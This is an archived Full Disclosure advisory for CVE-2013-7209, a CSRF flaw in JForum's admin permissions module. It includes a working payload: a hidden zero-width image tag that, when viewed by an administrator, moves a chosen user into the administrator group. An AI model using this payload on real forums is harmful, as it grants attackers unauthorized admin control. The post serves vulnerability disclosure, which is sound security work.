Full Disclosure mailing list archives
[CVE-2013-7209]JForum CSRF(Cross-site request forgery) Vulnerability
From: arno <arno.chen () dbappsecurity com cn>
Date: Thu, 26 Dec 2013 17:03:58 +0800
Version : All Vulnerability : Cross-site request forgery Problem type : remote CVE ID : CVE-2013-7209 Jforum Admin module, modify user permissions module exists crsf Vulnerability,use the following code into jforum forum posts, as long as this administrators is opened this post, the permissions of user with id 12696 will be Escalated to the group with id 2 permissions,default group with id 2 is administrator group. Code: <img src=http://www.target.com/forum/admBase/login.page?action=groupsSave&module=adminUsers&user_id=12696&groups=2 width=0 /> Code Description: http://www.target.com/forum/ jforum forum address, 12696 for the user id 2 group id width=0 is used to hide pic It was discovered by arno @dbappsecurity.com.cn
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- [CVE-2013-7209]JForum CSRF(Cross-site request forgery) Vulnerability arno (Dec 26)